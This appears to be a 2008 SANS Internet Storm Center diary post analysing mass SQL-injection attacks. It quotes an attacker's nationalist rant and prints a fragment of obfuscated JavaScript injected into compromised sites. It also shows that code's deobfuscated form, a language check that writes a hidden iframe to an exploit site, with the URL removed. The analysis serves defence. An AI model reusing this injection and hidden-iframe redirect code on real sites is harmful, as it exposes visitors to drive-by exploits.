Threat Level: green Handler on Duty: Brad Duncan

SANS ISC: InfoSec Handlers Diary Blog - SANS Internet Storm Center InfoSec Handlers Diary Blog

Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!

War of the worlds?

Published: 2008-05-14
Last Updated: 2008-05-14 00:31:33 UTC
by Bojan Zdrnja (Version: 1)
0 comment(s)

There have been a lot of discussions going on about these injection attacks. The one thing in common so far has been that the culprits are abusing security vulnerabilities in various web applications, mainly SQL injection.

Exploiting of such vulnerabilities became relatively easy (since there are many vulnerable applications that use similar backend logic), so the bad guys started releasing various tools that enable them to compromise sites automatically. I analyzed one such tool at, which was probably used for a lot of SQL injection attacks we have seen lately (but be aware that other similar tools exist and are actively used in the underground, one such tool in use with botnets was analyzed by Joe at SecureWorks,

While the motive for this is more or less standard – steal credentials or virtual goods so you can convert/sell that for real money (Mike and Steven from Shadowserver posted very nice articles at and - while analyzing one such site today I saw an interesting rant, presumably by the author.

The site has already been mentioned multiple times (, which appears to be finally taken down). The majority of attacks actually pointed to this site which happily served some exploits to the end user. However, this time the main index.htm file had this text appended at the bottom:

"This is a mass invasion.        Safeguard the motherland's dignity!
I love my motherland!
Please understand that I

(language edited)
Interesting. While this could have been added by anyone, I found another interesting thing thanks to a heads up from our friend Paul from Paul analyzed a compromised site which had this piece of JavaScript inserted:

n(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);returnp}('8(b.e==\'i-2\
'){}4{3.g("<9d=7:\/\/h.c.2\/a.6 f=15=0><\/9>");}',62,19,'|100|cn|document|else|height|htm|http|if|iframe|index

After deobfuscating the code, we get this:

if (navigator.systemLanguage=='zh-cn'){}else{document.writeln("<iframe
src=" width=100 height=0></iframe>");}

In other words, the code checks if the system language variable is set to ZH-CN (which is set on systems running in Chinese) and redirects you to the site hosting exploit only if that is not true. So the rant might really be from the author, after all since the code is attacking all non-Chinese machines. Are we getting more serious with this or the bottom line is still (and only) information stealing and money.



Keywords: malware
0 comment(s)
Diary Archives